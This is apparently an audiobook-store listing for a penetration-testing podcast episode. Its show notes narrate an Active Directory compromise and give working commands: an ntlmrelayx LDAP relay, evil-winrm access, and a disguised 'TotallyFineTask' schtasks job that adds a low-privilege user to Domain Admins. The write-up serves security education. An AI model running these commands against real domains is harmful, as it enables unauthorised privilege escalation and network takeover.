7MS #691: Tales of Pentest Pwnage – Part 75
Failed to add items
Sorry, we are unable to add the item because your shopping cart is already at capacity.
Add to basket failed.
Please try again later
Add to Wish List failed.
Please try again later
Remove from Wish List failed.
Please try again later
Follow podcast failed
Unfollow podcast failed
7MS #691: Tales of Pentest Pwnage – Part 75
-
Narrated by:
-
By:
About this listen
Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today’s episode:
- Got an SA account to a SQL server through Snaffler-ing
- With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here
- I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv
- I didn’t have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here
- Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket
- From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName
- Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
- …and ran it: schtasks /run /tn "TotallyFineTask"
No reviews yet
In the spirit of reconciliation, Audible acknowledges the Traditional Custodians of country throughout Australia and their connections to land, sea and community. We pay our respect to their elders past and present and extend that respect to all Aboriginal and Torres Strait Islander peoples today.